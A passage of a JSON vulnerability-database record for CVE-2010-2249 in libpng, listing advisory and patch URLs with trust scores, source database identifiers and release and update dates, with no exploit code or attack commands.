"url": "http://lists.apple.com/archives/security-announce/2010//nov/msg00003.html"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2011/mar/msg00000.html"
},
{
"trust": 1.8,
"url": "http://lists.apple.com/archives/security-announce/2011//mar/msg00004.html"
},
{
"trust": 1.8,
"url": "http://www.debian.org/security/2010/dsa-2072"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-july/044283.html"
},
{
"trust": 1.8,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-july/044397.html"
},
{
"trust": 1.8,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2010:133"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2010-09/msg00006.html"
},
{
"trust": 1.8,
"url": "http://www.ubuntu.com/usn/usn-960-1"
},
{
"trust": 1.8,
"url": "http://lists.vmware.com/pipermail/security-announce/2010/000105.html"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4435"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4456"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4457"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4554"
},
{
"trust": 1.8,
"url": "http://support.apple.com/kb/ht4566"
},
{
"trust": 1.8,
"url": "http://www.vmware.com/security/advisories/vmsa-2010-0014.html"
},
{
"trust": 1.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=608644"
},
{
"trust": 1.8,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/59816"
},
{
"trust": 1.7,
"url": "http://libpng.git.sourceforge.net/git/gitweb.cgi?p=libpng/libpng%3ba=commitdiff%3bh=90cfcecc09febb8d6c8c1d37ea7bb7cf0f4b00f3#patch20"
},
{
"trust": 1.7,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2010\u0026m=slackware-security.613061"
},
{
"trust": 1.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2249"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/59816"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu331391"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu935740"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-2249"
},
{
"trust": 0.7,
"url": "http://libpng.git.sourceforge.net/git/gitweb.cgi?p=libpng/libpng;a=commitdiff;h=90cfcecc09febb8d6c8c1d37ea7bb7cf0f4b00f3#patch20"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2010-2249"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2010:0534"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1205"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-2249"
},
{
"trust": 0.3,
"url": "http://blogs.sun.com/security/entry/multiple_vulnerabilities_in_libpng"
},
{
"trust": 0.3,
"url": "https://kb.bluecoat.com/index?page=content\u0026id=sa65"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100092842"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100093925"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100108439"
},
{
"trust": 0.3,
"url": "http://support.avaya.com/css/p8/documents/100148396"
},
{
"trust": 0.3,
"url": "http://www.mozilla.org/security/announce/2010/mfsa2010-41.html"
},
{
"trust": 0.3,
"url": "http://btsc.webapps.blackberry.com/btsc/search.do?cmd=displaykc\u0026doctype=kc\u0026externalid=kb27244"
},
{
"trust": 0.3,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1205"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0205"
},
{
"trust": 0.2,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0205"
},
{
"trust": 0.1,
"url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2010\u0026amp;m=slackware-security.613061"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/401.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=587670"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/960-1/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=22585"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/glsa/glsa-201010-01.xml"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny4.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny4.dsc"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_i386.deb"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_hppa.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_mips.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_arm.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_mipsel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny4_all.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_s390.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_mips.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_ia64.udeb"
},
{
"trust": 0.1,
"url": "http://packages.debian.org/\u003cpkg\u003e"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_alpha.udeb"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_armel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny4_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny4_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny4_sparc.deb"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/security/advisoiries"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-0425"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-3277"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/download/player/"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/security"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3277"
},
{
"trust": 0.1,
"url": "http://kb.vmware.com/kb/1055"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0434"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/download/ws/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0425"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/security_response.html"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/player31/doc/releasenotes_player312.html"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/eos.html"
},
{
"trust": 0.1,
"url": "http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html"
},
{
"trust": 0.1,
"url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
},
{
"trust": 0.1,
"url": "http://www.vmware.com/support/policies/eos_vi.html"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42.orig.tar.bz2"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_lpia.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.2.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-2ubuntu2.2_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-3ubuntu0.3_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42-1ubuntu2.1.debian.tar.bz2"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.6_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.42-1ubuntu2.1.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.6.diff.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.2.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.42-1ubuntu2.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_i386.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.2.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.2_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.3.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.42-1ubuntu2.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.2.diff.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.42-1ubuntu2.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.3.diff.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.3_lpia.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.6_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.37-1ubuntu0.2_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.6_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.42-1ubuntu2.1_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.6_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.6.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.2_lpia.udeb"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-6218"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.1,
"url": "http://store.mandriva.com/product_info.php?cpath=149\u0026products_id=490"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/advisories"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-6218"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-44854"
},
{
"db": "VULMON",
"id": "CVE-2010-2249"
},
{
"db": "BID",
"id": "41174"
},
{
"db": "PACKETSTORM",
"id": "94522"
},
{
"db": "PACKETSTORM",
"id": "91973"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "91619"
},
{
"db": "PACKETSTORM",
"id": "91878"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-491"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805"
},
{
"db": "NVD",
"id": "CVE-2010-2249"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-44854",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2010-2249",
"ident": null
},
{
"db": "BID",
"id": "41174",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "94522",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "91973",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "94244",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "91619",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "91878",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201006-491",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001805",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2010-2249",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2010-06-30T00:00:00",
"db": "VULHUB",
"id": "VHN-44854",
"ident": null
},
{
"date": "2010-06-30T00:00:00",
"db": "VULMON",
"id": "CVE-2010-2249",
"ident": null
},
{
"date": "2010-06-25T00:00:00",
"db": "BID",
"id": "41174",
"ident": null
},
{
"date": "2010-10-05T22:16:57",
"db": "PACKETSTORM",
"id": "94522",
"ident": null
},
{
"date": "2010-07-20T00:53:34",
"db": "PACKETSTORM",
"id": "91973",
"ident": null
},
{
"date": "2010-09-25T18:50:30",
"db": "PACKETSTORM",
"id": "94244",
"ident": null
},
{
"date": "2010-07-08T21:03:46",
"db": "PACKETSTORM",
"id": "91619",
"ident": null
},
{
"date": "2010-07-16T04:34:46",
"db": "PACKETSTORM",
"id": "91878",
"ident": null
},
{
"date": "2010-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201006-491",
"ident": null
},
{
"date": "2010-08-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-001805",
"ident": null
},
{
"date": "2010-06-30T18:30:01.847000",
"db": "NVD",
"id": "CVE-2010-2249",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-13T00:00:00",
"db": "VULHUB",
"id": "VHN-44854",
"ident": null
},
{
"date": "2020-08-14T00:00:00",
"db": "VULMON",
